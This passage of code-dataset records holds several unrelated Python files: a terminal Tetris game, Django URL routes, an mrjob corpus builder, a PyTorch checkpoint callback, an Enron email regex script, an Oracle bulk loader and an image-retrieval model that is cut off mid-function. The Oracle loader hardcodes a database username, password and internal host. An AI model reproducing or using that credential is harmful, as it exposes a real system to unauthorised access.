#游戏板数据结构用来记录之前着陆的砖块。该函数所做的事情是接受一个砖块数据结构,并且将其上的有效砖块添加到游戏板数据结构中\n for x in range(TEMPLATEWIDTH): #该函数这在一个砖块着陆之后进行\n for y in range(TEMPLATEHEIGHT):#嵌套for遍历了5x5砖块数据结构,当找到一个有效砖块时,将其添加到游戏板中\n if PIECES[piece['shape']][piece['rotation']][y][x] != BLANK:\n board[x + piece['x']][y + piece['y']] = piece['color'] #游戏板数据结构的值有两种形式:数字(表示砖块颜色),'.'即空白,表示该处没有有效砖块\n\ndef getNewPiece():\n # return a random new piece in a random rotation and color\n shape = random.choice(list(PIECES.keys()))\n newPiece = {'shape': shape,\n 'rotation': random.randint(0, len(PIECES[shape]) - 1),\n 'x': int(BOARDWIDTH / 2) - int(TEMPLATEWIDTH / 2), # x居中\n 'y': -1, # y在屏幕的上方,小于0\n 'color': random.randint(0, len(COLORS)-1)}\n return newPiece\n\ndef getBlankBoard(): #创建一个新的游戏板数据结构。\n board = [] #创建一个空白的游戏板\n for i in range(BOARDWIDTH):# range(10)=[0,9] BOARDWIDTH=10 BLANK = '.' 
#表示空白空格\n board.append([BLANK] * BOARDHEIGHT)\n #board[0]-board[9]每一个变量的值���是20个.组成的列表 \n return board\n\ndef drawWindow(screen):\n lefttopx = int((WINDOWWIDTH - BOARDWIDTH * BOXSIZE)/2)\n lefttopy = int((WINDOWHEIGHT - BOARDHEIGHT * BOXSIZE)/2)\n global XMARGIN\n XMARGIN = lefttopx\n global TOPMARGIN\n TOPMARGIN = lefttopy\n rightbottomx = int(lefttopx + BOARDWIDTH * BOXSIZE)\n rightbottomy = int(lefttopy + BOARDHEIGHT * BOXSIZE)\n for i in range(lefttopy, rightbottomy):\n screen.image[i][lefttopx-1]='|'\n screen.image[i][rightbottomx]='|'\n for j in range(lefttopx, rightbottomx):\n screen.image[lefttopy-1][j]='-'\n screen.image[rightbottomy][j]='-' \n\ndef drawBoard(screen, board):\n drawWindow(screen)\n for x in range(BOARDWIDTH):#遍历游戏板\n for y in range(BOARDHEIGHT):\n drawBox(screen, x, y, board[x][y])#这个函数会自动找出有效方块并绘制\n\ndef convertToPixelCoords(boxx, boxy):#将游戏板上方块的坐标转化成像素坐标\n return (XMARGIN + (boxx * BOXSIZE)), (TOPMARGIN + (boxy * BOXSIZE))#XMARGIN为游戏板左顶点的横坐标,TOPMARGIN为游戏板左顶点的纵坐标\n\ndef drawBox(screen, boxx, boxy, color, pixelx=None, pixely=None):#绘制一个有效方块\n if color == BLANK: #如果这不是一个有效方块,这是5x5一个空白\n return\n if pixelx == None and pixely == None:\n pixelx, pixely = convertToPixelCoords(boxx, boxy)#将游戏板上方块的坐标转化成像素坐标\n terminalgame.draw.rect(screen, Rect(pixelx, pixely, BOXSIZE, BOXSIZE), pointtype=COLORS[color])#留出1像素的空白,这样才能在砖块中看到组成砖块\n\ndef drawPiece(screen, piece, pixelx=None, pixely=None):#pixelx, pixely为5x5砖块数据结构左上角在游戏板上的的坐标\n shapeToDraw = PIECES[piece['shape']][piece['rotation']]#PIECES[piece['shape']][piece['rotation']]为一个图形的一种旋转方式\n if pixelx == None and pixely == None: \n pixelx, pixely = convertToPixelCoords(piece['x'], piece['y'])#将砖块坐标转换为像素坐标。\n for x in range(TEMPLATEWIDTH): #遍历5x5砖块数据结构\n for y in range(TEMPLATEHEIGHT):\n if shapeToDraw[y][x] != BLANK:\n drawBox(screen, None, None, piece['color'], pixelx+(x * BOXSIZE), pixely + (y * BOXSIZE))\n\ndef isCompleteLine(board, y):#判断y行是否填满,填满返回True\n for x in range(BOARDWIDTH):#遍历该行的所有砖块\n if board[x][y] == BLANK:#如果存在空白,则没填满\n return False\n return True\n\ndef removeCompleteLines(board):#删除所有填满行,每删除一行要将游戏板上该行之上的所有方块都下移一行。返回删除的行数\n numLinesRemoved = 0\n y = BOARDHEIGHT - 1 # BOARDHEIGHT=20-1=19即从最低行开始\n while y >= 0:#注意当删除一行时y没有生变化,因为此时它的值已经更新为新的一行了\n if isCompleteLine(board, y):#如果该行填满\n for pullDownY in range(y, 0, -1): #range(y, 0, -1)范围[y,1]\n for x in range(BOARDWIDTH):\n board[x][pullDownY] = board[x][pullDownY-1]#将删除的行之上的每一行的值都复制到下一行\n for x in range(BOARDWIDTH):#删除第一行\n board[x][0]=BLANK\n numLinesRemoved=numLinesRemoved+1\n else:\n y =y- 1 #移到下一行\n return numLinesRemoved\n\nif __name__ == \"__main__\":\n terminalgame.init()\n screen = terminalgame.display.set_mode(WINDOWHEIGHT,WINDOWWIDTH,border=True)\n height = terminalgame.display.height\n width = terminalgame.display.width\n lastFallTime = time.time()#最后下落砖块的时间\n movingDown = False #没有按下向下方向键\n movingLeft = False #没有按下向左方向键\n movingRight = False #没有按下向右方向键\n board = getBlankBoard()\n fallingPiece = getNewPiece()\n clock = terminalgame.time.Clock()\n scores = 0\n while True:\n clock.tick(20)\n if fallingPiece == None:\n fallingPiece = getNewPiece()\n if not isValidPosition(board, fallingPiece):\n terminalgame.quit()\n exit()\n for event in terminalgame.event.get():\n if event.type == KEYUP:\n if (event.key == K_LEFT):#判断当前弹起的按键是否为左方向键\n movingLeft = False #是的话置为False,表示玩家不再想要让砖块朝着该方向移动。\n elif (event.key == K_RIGHT):#同上\n movingRight = False\n elif (event.key == K_DOWN):#同上\n movingDown = False\n elif event.key == K_q:\n terminalgame.quit()\n exit() \n elif 
event.type == KEYDOWN:\n if (event.key == K_LEFT) and isValidPosition(board, fallingPiece, adjX=-1):\n fallingPiece['x'] = fallingPiece['x'] -1 #左移\n movingLeft = True #将movingLeft变量设置为True,并且为了确保落下的砖块不会既向左又向右移动\n movingRight = False #将 movingRight设置为False\n elif (event.key == K_RIGHT ) and isValidPosition(board, fallingPiece, adjX=1): #同上\n fallingPiece['x'] =fallingPiece['x'] + 1\n movingRight = True\n movingLeft = False\n elif event.key == K_UP :\n fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])\n if not isValidPosition(board, fallingPiece):\n fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])\n elif (event.key == K_DOWN ):\n movingDown = True # movingDown设置为True\n if isValidPosition(board, fallingPiece, adjY=1):#下一个位置有效\n fallingPiece['y'] = fallingPiece['y'] +1 #移动\n\n if time.time() - lastFallTime > fallFreq:#fallFreq向下移动的速率\n if not isValidPosition(board, fallingPiece, adjY=1):#当砖块下一个位置无效时,即表示砖块当前已经着陆了。\n addToBoard(board, fallingPiece) #在游戏板数据结构中记录这个着陆的砖块\n scores += removeCompleteLines(board)# removeCompleteLines()将负责删除掉游戏板上任何已经填充完整的行,并且将方块向下推动。\n fallingPiece = None#最后我们将fallingPiece变量设置为None,以表示下一个砖块应该变为新的下落砖块,并且应该生成一个随机的新砖块作为下一个砖块。??????\n else:\n # 如果砖块没有着陆,我们直接将其Y位置向下设置一个空格,并且将lastFallTime重置为当前时间\n fallingPiece['y'] = fallingPiece['y'] +1\n lastFallTime = time.time()\n screen.fill()\n scores_sur = Surface(1,30)\n scores_image = list(\"scores: \"+str(scores))\n em_len = 30 - len(scores_image)\n em_image = [\"\" for i in range(em_len)]\n scores_image.extend(em_image)\n scores_sur.image = [scores_image]\n screen.blit(scores_sur, Rect(0,0,0,0))\n drawBoard(screen, board)\n if fallingPiece != None:#砖块没有下落到底部\n drawPiece(screen, fallingPiece)\n terminalgame.display.flip()\n terminalgame.quit()\n","sub_path":"examples/Tetris/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191341753","text":"\"\"\"HoroCoin URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path\r\nfrom polls.views import *\r\nurlpatterns = [\r\n path('', EnterPage, name='home'),\r\n path('admin/', admin.site.urls),\r\n #path('main/',EnterPage),\r\n path('admin-panel/',adminPan),\r\n path('control-users/',panel),\r\n path('menu/',menu),\r\n path('perspage/',lk),\r\n path('spisok-zakazov/',product),\r\n path('info/',info),\r\n path('task-panel/', tasks),\r\n path('tasks/',earncoin),\r\n path('teacher/',teachpanel),\r\n path('earnmoney/',earnpan)\r\n]\r\n","sub_path":"HoroCoin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"560985254","text":"#In this implementation,each word in the dictionary is indexed by \n#its frequency of occurence and not its position in the dictionary \n#as is the case with data.py\n\nimport pandas as pd\nimport os,sys\nimport numpy as np\nimport re\nimport torch\nfrom collections import defaultdict\nfrom itertools import islice\nimport pickle\n\nimport time\n\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\n\n\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n\ndata={}\ncorpus=[]\n\nclass Make_Corpus(MRJob):\n def __init__(self,args):\n super(Make_Corpus, self).__init__(args=args)\n self.sentence_num=-1\n\n def mapper_get_words(self,_,sentence):\n sentence=sentence.lower()\n sentence=re.sub(r'
<br />|<br/>
',' ',sentence)\n sentence=re.sub(r'[^A-Za-z0-9\\s]','',sentence)\n tokens=sentence.split() +['']\n self.sentence_num+=1\n\n for token in tokens:\n yield(self.sentence_num,data[token])\n\n def reducer_update_corpus(self,token,values):\n #print(token,values)\n corpus.append(list(values))\n yield ('updated','updated')\n\n def steps(self):\n return [\n MRStep(mapper=self.mapper_get_words,\n reducer=self.reducer_update_corpus)\n ] \n\nclass Make_Dictionary(MRJob):\n def __init__(self,args):\n super(Make_Dictionary, self).__init__(args=args)\n self.sentence_num=-1\n\n def mapper_get_words(self,_,sentence):\n sentence=sentence.lower()\n sentence=re.sub(r'
<br />|<br/>
',' ',sentence)\n sentence=re.sub(r'[^A-Za-z0-9\\s]','',sentence)\n print(\"Input sentence: \",sentence)\n tokens=sentence.split() +['']\n self.sentence_num+=1\n #print(self.sentence_num)\n for token in tokens:\n yield(token,1)\n\n def reducer_update_dict(self,token,values):\n #print(token,values)\n data[token]=sum(values)\n yield (token,data[token])\n\n def steps(self):\n return [\n MRStep(mapper=self.mapper_get_words,\n reducer=self.reducer_update_dict),\n ] \n \nif __name__ =='__main__':\n start=time.time()\n Make_Dictionary(sys.argv[1]).run()\n print(\"Time to build dictionary: \",time.time() - start)\n #write the dictionary to a file\n print(take(100,data.items()))\n Make_Corpus(sys.argv[1]).run() \n pickle.dump(corpus,open(\"amazon_text_corpus2.p\", \"wb\" )) \n \n\n\n","sub_path":"AmazonFoodReviews_Dataset-master/SentimentAnalysis/mrjob_data.py","file_name":"mrjob_data.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466650578","text":"\"\"\"Implements Model Checkpoint Callback.\"\"\"\nfrom abc import ABC\nfrom typing import Dict\n\nimport numpy as np\nimport torch\n\nfrom torchflare.callbacks.callback import Callbacks\nfrom torchflare.callbacks.states import CallbackOrder\n\n\nclass ModelCheckpoint(Callbacks, ABC):\n \"\"\"Callback for Checkpointing your model.\"\"\"\n\n def __init__(self, mode: str = \"min\", monitor: str = \"val_loss\"):\n \"\"\"Constructor for ModelCheckpoint class.\n\n Args:\n mode: One of {\"min\", \"max\"}.\n In min mode, training will stop when the quantity monitored has stopped decreasing\n in \"max\" mode it will stop when the quantity monitored has stopped increasing.\n monitor: The quantity to be monitored. (Default : val_loss)\n If you want to monitor other metric just pass in the name of the metric.\n\n Note:\n\n ModelCheckpoint will save state_dictionaries for model , optimizer , scheduler\n and the value of epoch with following key values:\n\n 1) 'model_state_dict' : The state dictionary of model\n 2) 'optimizer_state_dict' : The state dictionary of optimizer\n 3) 'scheduler_state_dict' : The state dictionary of scheduler.(If used)\n 4) 'Epoch' : The epoch at which model was saved.\n\n Model checkpoint will be saved based on the values of metrics/loss obtained from validation set.\n \"\"\"\n super(ModelCheckpoint, self).__init__(order=CallbackOrder.INTERNAL)\n self.mode = mode\n self.eps = 1e-7\n if \"val_\" not in monitor:\n self.monitor = \"val_\" + monitor\n else:\n self.monitor = monitor\n\n if self.mode == \"max\":\n self.best_val = -np.inf\n self.improvement = lambda val, best_val: val >= best_val + self.eps\n else:\n self.best_val = np.inf\n self.improvement = lambda val, best_val: val <= best_val + self.eps\n\n def checkpoint(self, epoch: int):\n \"\"\"Method to save the state dictionaries of model, optimizer,etc.\n\n Args:\n epoch : The epoch at which model is saved.\n \"\"\"\n if self.exp.scheduler_stepper is not None:\n torch.save(\n {\n \"model_state_dict\": self.exp.model.state_dict(),\n \"optimizer_state_dict\": self.exp.optimizer.state_dict(),\n \"scheduler_state_dict\": self.exp.scheduler_stepper.scheduler.state_dict(),\n \"Epoch\": epoch,\n },\n self.exp.path,\n )\n else:\n torch.save(\n {\n \"model_state_dict\": self.exp.model.state_dict(),\n \"optimizer_state_dict\": self.exp.optimizer.state_dict(),\n \"Epoch\": epoch,\n },\n self.exp.path,\n )\n\n def epoch_end(self, epoch: int, logs: Dict):\n \"\"\"Method to save best model 
depending on the monitored quantity.\n\n Args:\n epoch: The current epoch.\n logs: A dictionary containing metrics and loss values.\n \"\"\"\n val = logs.get(self.monitor)\n\n if self.improvement(val=val, best_val=self.best_val):\n\n self.checkpoint(epoch=epoch)\n","sub_path":"torchflare/callbacks/model_checkpoint.py","file_name":"model_checkpoint.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"557975381","text":"\"\"\"When attempting to model text, it is important to be able to ex- tract features of the text for analysis. \nA powerful tool for extracting text features (as well as for searching, replacing, and performing other text-based tasks) is Regular Expression (regex). \nFor this assignment, your job is to process features of emails sent and received by Enron employees during the investigation into fraud- ulent activity by Enron executives in the early 2000’s using regular ex- pressions. \nGiven emails from a single employee, generate the following information for each email:\nExtract the text of the email into one feature\nCreate a column labelled “worry” containing the following values: 1 if some form of the word “worry” is contained in the text of the email, 0 otherwise\nCreate a column labelled “trouble” with the following values: 1 if some form of the word “trouble” is contained in the text of the email, 0 otherwise\nCreate a column containing the number of recipients of the email\nCreate a column labelled “sent” with the following values: 1 if the email was sent by the user, 0 otherwise Submit your code, as well a csv containing the new columns, to Canvas when you complete this assignment.\"\"\"\n\n\"\"\"import the necessary packages\"\"\"\nimport pandas as pd \nimport re\n\n\n# In[59]:\n\n\n\"\"\"read the file into the main dataframe\"\"\"\ndata = pd.read_csv('Link to the file') #download the file in the same repo. Insert the local link to the file here\ndata = data.loc[:,'text'] #choose only the text column\nlength = len(data)\nlength #get the length of the dataframe\n\n\n# In[60]:\n\n\n\"\"\"To get only the text of the email. 
I noticed the pattern that the real text starts after nsf or PST, followed by \\n\\n\"\"\"\ntext = [] #a placeholder array\nfor i in range (0,length):\n try:\n temp = re.search(r'(?:(nsf\\n\\n|PST\\n\\n).*)((?:\\n?).*)+(.*)', data[i], re.IGNORECASE).group()[5:] \n except:\n temp = None\n #temp = re.search(r'(?:(nsf\\n\\n).*)((?:\\n).*)+(.*)',data[i])\n #temp = temp.group()\n #temp = temp[5:] \n text.append(temp)\nText = pd.DataFrame(text, columns = ['Text']) #turn it into a dataframe and name the column Text\n\n\n# In[61]:\n\n\n\"\"\"Check if the text has any variation of the word 'worry'\"\"\"\nworry = []\nfor i in range (0,length):\n test = 0\n patterns = [\"worry\", \"worried\", \"worrying\", \"worrisome\"]\n for pattern in patterns:\n if re.search(pattern, text[i], re.IGNORECASE): #search any of the item in the patterns array\n test += 1\n if test == 0:\n worry.append(0)\n else:\n worry.append(1)\n \nWorry = pd.DataFrame(worry, columns = ['Worry']) #turn it into a dataframe and name the column 'Worry'\n\n\n# In[62]:\n\n\n\"\"\"Check if the text has any variation of the word 'trouble'\"\"\"\ntrouble = []\nfor i in range (0,length):\n test = 0\n patterns = [\"trouble\", \"troublesome\", \"troubling\", \"troubled\"]\n for pattern in patterns:\n if re.search(pattern, text[i], re.IGNORECASE): #search any of the item in the patterns array\n test += 1\n if test == 0:\n trouble.append(0)\n else:\n trouble.append(1)\nTrouble = pd.DataFrame(trouble, columns = ['Trouble']) #turn it into a dataframe and name the column 'Trouble'\n\n\n# In[63]:\n\n\n\"\"\"check if the sender is Stacey White\"\"\"\ntestfrom = []\nfor i in range (0,length):\n try:\n temp = re.search(r'(?:(From:).*)', data[i], re.IGNORECASE).group()[6:] #get the From part of the emails\n except:\n temp = None\n testfrom.append(temp)\nsenttest = []\nfor i in range (0, len(testfrom)):\n test = 0\n patterns = \"stacey.white@enron.com\" \n if testfrom[i] == patterns: #check if the sender is Stacey White\n test += 1\n if test == 0:\n senttest.append(0)\n else:\n senttest.append(1)\nSent = pd.DataFrame(senttest, columns = ['Sent']) #turn it into a dataframe and name the column Sent\n\n\n# In[64]:\n\n\n\"\"\"Count how many emails there are in to, Cc and Bcc areas\"\"\"\ntestemail = [] #placeholder array\nfor i in range (0,length):\n \"\"\"This part is to get all text from To to X-From.\n There can be no '\\n\\ between To and X-From. 
That's why the formula has two parts\"\"\"\n try: \n temp = re.search(r'(?:(To:).*)(?:(X-From:))|(?:(To:).*)((?:\\n).*)+(?:(X-From:))', data[i]).group()[4:][:-8]\n except:\n temp = None\n testemail.append(temp)\nresult = []\nfor i in range (0, length):\n try:\n result.append(len(re.findall(r'@\\w+.\\w+',testemail[i]))) #count how many emails there are in the whole part\n except:\n result.append(0)\nEmailCount = pd.DataFrame(result, columns = ['SentEmailCount']) #turn it into a dataframe and name the column SentEmailCount\n\n\n# In[68]:\n\n\ndf = pd.concat([Text, Worry, Trouble, EmailCount, Sent ], axis=1) #concatenate the dataframes\ndf.to_csv('text.csv') #export to a csv\n\n","sub_path":"MinhDuong/Text_Python/Text_Analysis.py","file_name":"Text_Analysis.py","file_ext":"py","file_size_in_byte":4816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96076712","text":"import cx_Oracle\nimport os\n\n\ndef LoadList(MyList):\n\ttry:\n\t\tcon = cx_Oracle.connect('DWH_JPH/axadirect@hvm0dwd7:1521/DWH_DEV')\n\t\tcur = con.cursor()\n\t\tcur.prepare('''INSERT INTO cvrtt VALUES (\n\t\t\t\t\t\t\t\tto_number(:1),\n\t\t\t\t\t\t\t\tto_number(:2),\n\t\t\t\t\t\t\t\tto_date(:3,'YYYY-MM-DD HH24:MI:SS'),\n\t\t\t\t\t\t\t\t:4,\n\t\t\t\t\t\t\t\tto_number(:5),\n\t\t\t\t\t\t\t\tto_number(:6),\n\t\t\t\t\t\t\t\tto_number(:7)\n\t\t\t\t\t\t\t\t)''')\n\t\tcur.executemany(None, MyList)\n\t\tcon.commit()\n\t\tcur.close()\n\t\tcon.close()\n\texcept:\n\t\ttry:\n\t\t\tcon.rollback()\n\t\t\tcon.close()\n\t\texcept:\n\t\t\tpass\n\t\tLoadList(MyList)\n\t\n\t\n\nif __name__ == \"__main__\":\n\n\tMyList=[]\n\t\n\t\n\twith open(\"CallCostAllocation_small.csv\",\"r\") as InFile:\n\t\tInFile.readline()\n\t\tfor i, line in enumerate(InFile):\n\t\t\tsline = line.strip().split(',')\n\t\t\tMyList.append((sline[0],sline[1],sline[2],sline[3],sline[4],sline[5],sline[6]))\n\t\t\tif i%5000 == 0:\n\t\t\t\tLoadList(MyList)\n\t\t\t\tMyList = []\n\n\tLoadList(MyList)\n\n\n\n","sub_path":"Divers_Python/Load_table_call.py","file_name":"Load_table_call.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483259671","text":"import numpy as np\nimport torch\nimport copy, os\nfrom collections import OrderedDict\nfrom util.util import util\nfrom util.image_pool import ImagePool\nfrom .base_model import BaseModel\nfrom . 
import networks\nimport glob\nimport torch.nn.functional as F\nimport cv2\nfrom skimage import io\n\n\ndef norm_image(image):\n \"\"\"\n :param image: image with [H,W,C]\n :return: image in np uint8\n \"\"\"\n image = image.copy()\n image -= np.max(np.min(image), 0)\n image /= np.max(image)\n image *= 255.\n return np.uint8(image)\n\n\nclass DISAM_Model(BaseModel):\n def name(self):\n return 'DISAM_Model'\n\n def __init__(self, opt):\n super(DISAM_Model, self).__init__(opt)\n\n self.n_domains = opt.n_domains\n self.DA, self.DB = None, None\n self.real_A = self.Tensor(opt.batchSize, opt.input_nc, opt.fineSize, opt.fineSize)\n self.real_B = self.Tensor(opt.batchSize, opt.output_nc, opt.fineSize, opt.fineSize)\n\n # used metrics\n self.cos = torch.nn.CosineSimilarity(dim=0, eps=1e-8)\n self.mean_cos = torch.nn.CosineSimilarity(dim=1, eps=1e-8)\n self.L2loss = torch.nn.MSELoss()\n\n # load/define networks\n self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf,\n opt.netG_n_blocks, opt.netG_n_shared,\n self.n_domains, opt.norm, opt.use_dropout, self.gpu_ids)\n if not self.isTrain:\n self.use_two_stage = opt.use_two_stage\n if self.use_two_stage:\n self.netG_finer = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf,\n opt.netG_n_blocks, opt.netG_n_shared,\n self.n_domains, opt.norm, opt.use_dropout, self.gpu_ids)\n self.top_n = opt.top_n\n\n self.last_retrieval_index_c0 = 0\n self.last_retrieval_index_c1 = 0\n self.last_domain = 0\n\n if self.isTrain:\n blur_fn = lambda x: torch.nn.functional.conv2d(x, self.Tensor(util().gkern_2d()), groups=3, padding=2)\n self.netD = networks.define_D(opt.output_nc, opt.ndf, opt.netD_n_layers,\n self.n_domains, blur_fn, opt.norm, self.gpu_ids)\n\n if not self.isTrain or opt.continue_train:\n which_epoch = opt.which_epoch\n self.load_network(self.netG, 'G', which_epoch)\n if not self.isTrain:\n if opt.use_two_stage:\n self.load_network(self.netG_finer, 'G', opt.which_epoch_finer, self.use_two_stage)\n if self.isTrain:\n self.load_network(self.netD, 'D', which_epoch)\n\n if not self.isTrain:\n self.test_using_cos = opt.test_using_cos\n # used for retrieval\n self.database_feature_c0 = []\n self.database_path_c0 = []\n self.database_feature_c1 = []\n self.database_path_c1 = []\n self.database_dist_list_c0 = [] # only for visualization\n self.query_feature_list = []\n self.dist_mat_torch = None\n self.robotcar_database = []\n\n if self.isTrain:\n self.neg_B = self.Tensor(opt.num_hard_neg, opt.input_nc, opt.fineSize, opt.fineSize)\n self.train_using_cos = opt.train_using_cos\n self.fake_pools = [ImagePool(opt.pool_size) for _ in range(self.n_domains)]\n # used in the adaptive triplet loss\n self.margin = opt.margin\n self.adapt = opt.adapt\n self.margin_sam_triplet = opt.margin_sam_triplet\n self.adapt_sam_triplet = opt.adapt_sam_triplet\n self.use_realAB_as_negative = opt.use_realAB_as_negative\n self.hard_negative = opt.hard_negative\n # define loss functions\n self.criterionCycle = torch.nn.SmoothL1Loss()\n self.criterionGAN = networks.GANLoss(use_lsgan=not opt.no_lsgan, tensor=self.Tensor)\n # initialize optimizers\n self.netG.init_optimizers(torch.optim.Adam, opt.lr, (opt.beta1, 0.999))\n self.netD.init_optimizers(torch.optim.Adam, opt.lr, (opt.beta1, 0.999))\n # initialize loss storage\n self.loss_D, self.loss_G = [0] * self.n_domains, [0] * self.n_domains\n self.loss_cycle = [0] * self.n_domains\n self.loss_triplet = [0] * self.n_domains\n self.loss_sam = [0] * self.n_domains\n self.loss_sam_triplet = [0] * self.n_domains\n 
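# Editor's note (summarizing backward_G below): the triplet losses use an\n            # adaptive margin m(d_p) = margin * exp(-adapt * d_p), so the required\n            # anchor/negative separation relaxes as the positive distance grows:\n            #     loss_triplet = max(0, 1 - d_n / (margin * exp(-adapt * d_p) + d_p))\n            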
self.feature_distance = [0] * self.n_domains\n self.feature_cos = [0] * self.n_domains\n self.use_cos_latent_with_L2 = opt.use_cos_latent_with_L2\n # initialize loss multipliers\n self.lambda_triplet, self.lambda_cyc, self.lambda_latent = opt.lambda_triplet, opt.lambda_cycle, opt.lambda_latent\n self.lambda_sam, self.lambda_sam_triplet = opt.lambda_sam, opt.lambda_sam_triplet\n\n def set_input(self, input):\n input_A = input['A']\n self.real_A.resize_(input_A.size()).copy_(input_A)\n self.DA = input['DA'][0]\n if self.isTrain:\n input_B = input['B']\n self.real_B.resize_(input_B.size()).copy_(input_B)\n self.DB = input['DB'][0]\n if self.hard_negative:\n self.neg_B = input['neg_B_tensor'][0].cuda()\n self.neg_DB_list = input['neg_DB_list'][0]\n self.image_paths = input['path']\n\n def image_retrieval(self, query_encoded, query_path, query_encoded_finer=None, test_index=-1):\n \"\"\"\n Used to retrieve the target image in the database given the query encoded feature\n :param query_encoded: the query code\n :param query_path: the path of query image\n :param query_encoded_finer: the query code in the finer retrieval model\n :param test_index: the index of input query images when testing\n :return: the retrieved iamge path and the encoded feature in the database\n \"\"\"\n min_dix = 100000\n if self.use_two_stage:\n top_n_tensor = torch.ones(self.top_n) * 100000\n top_n_tensor = top_n_tensor.cuda()\n top_n_index = torch.ones(self.top_n)\n path = None\n final_index = 0\n\n if query_path.split('/')[-1][11] == '0':\n # for c0, camera 0 in the CMU-Seasons dataset\n self.database_dist_list_c0 = []\n for i, db_path in enumerate(self.database_path_c0):\n if self.test_using_cos:\n # use the cosine retrieval metric\n if self.opt.mean_cos:\n dist = -self.mean_cos(query_encoded.view(256, -1),\n self.database_feature_c0[i][0].view(256, -1)).mean(0)\n else:\n dist = -self.cos(query_encoded.view(-1),\n self.database_feature_c0[i][0].view(-1))\n else:\n # use L2 metric\n dist = self.L2loss(query_encoded.view(-1), self.database_feature_c0[i][0].view(-1))\n self.database_dist_list_c0.append(dist.item())\n if not self.use_two_stage:\n if dist < min_dix:\n min_dix = dist\n final_index = i\n path = db_path\n else:\n # find top N for finer retrieval\n if dist < top_n_tensor[self.top_n - 1]:\n top_n_tensor[self.top_n - 1] = dist\n top_n_index[self.top_n - 1] = i\n tmp = top_n_tensor.sort()\n top_n_tensor = tmp[0]\n top_n_index = top_n_index[tmp[1]]\n if self.use_two_stage:\n # from coarse to fine strategy\n for i in list(range(self.top_n)):\n if self.test_using_cos:\n if self.opt.meancos_finer:\n dist = -self.mean_cos(query_encoded_finer.view(256, -1),\n self.database_feature_c0[top_n_index[i].int()][1].view(256, -1)).mean(0)\n else:\n dist = -self.cos(query_encoded_finer.view(-1),\n self.database_feature_c0[top_n_index[i].int()][1].view(-1))\n else:\n dist = self.L2loss(query_encoded_finer.view(-1),\n self.database_feature_c0[top_n_index[i].int()][1].view(-1))\n if dist < min_dix:\n min_dix = dist\n final_index = top_n_index[i].int()\n path = self.database_path_c0[final_index]\n if self.opt.save_sam_visualization and test_index % 10 == 0:\n # save the visualized SAM maps\n self.find_grad_sam(query_encoded_finer, query_path, self.database_feature_c0[\n self.database_dist_list_c0.index(sorted(self.database_dist_list_c0)[100])][1], test_index, 100)\n self.find_grad_sam(self.database_feature_c0[\n self.database_dist_list_c0.index(sorted(self.database_dist_list_c0)[100])][\n 1], self.database_path_c0[\n 
self.database_dist_list_c0.index(sorted(self.database_dist_list_c0)[100])],\n query_encoded_finer, test_index, 100)\n self.find_grad_sam(query_encoded_finer, self.image_paths[0],\n self.database_feature_c0[final_index][1], test_index)\n self.find_grad_sam(self.database_feature_c0[final_index][1], path, query_encoded_finer, test_index)\n print(\"Minimun distance is :\", min_dix.item(), \" least index: \", final_index)\n print(\"Retrieved path: \", path.split('/')[-1], \" query path: \", query_path.split('/')[-1])\n else:\n for i, db_path in enumerate(self.database_path_c1):\n # for camera 1\n if self.test_using_cos:\n if self.opt.mean_cos:\n dist = -self.mean_cos(query_encoded.view(256, -1),\n self.database_feature_c1[i][0].view(256, -1)).mean(0)\n else:\n dist = -self.cos(query_encoded.view(-1),\n self.database_feature_c1[i][0].view(-1)) # + L2loss(query_encoded,item[1])*0\n else:\n dist = self.L2loss(query_encoded.view(-1), self.database_feature_c1[i][0].view(-1))\n if not self.use_two_stage:\n if dist < min_dix:\n min_dix = dist\n final_index = i\n path = db_path\n else:\n if dist < top_n_tensor[self.top_n - 1]:\n top_n_tensor[self.top_n - 1] = dist\n top_n_index[self.top_n - 1] = i\n tmp = top_n_tensor.sort()\n top_n_tensor = tmp[0]\n top_n_index = top_n_index[tmp[1]]\n if self.use_two_stage:\n for i in list(range(self.top_n)):\n if self.test_using_cos:\n if self.opt.meancos_finer:\n dist = -self.mean_cos(query_encoded_finer.view(256, -1),\n self.database_feature_c1[top_n_index[i].int()][1].view(256, -1)).mean(0)\n else:\n dist = -self.cos(query_encoded_finer.view(-1),\n self.database_feature_c1[top_n_index[i].int()][1].view(-1))\n else:\n dist = self.L2loss(query_encoded_finer.view(-1),\n self.database_feature_c1[top_n_index[i].int()][1].view(-1))\n if dist < min_dix:\n min_dix = dist\n final_index = top_n_index[i].int()\n path = self.database_path_c1[final_index]\n print(\"Minimun distance is :\", min_dix.item(), \" least index: \", final_index)\n print(\"Retrieved path: \", path.split('/')[-1], \" query path: \", query_path.split('/')[-1])\n if query_path.split('/')[-1][11] == '0':\n if self.use_two_stage:\n return path, self.database_feature_c0[final_index][1]\n else:\n return path, 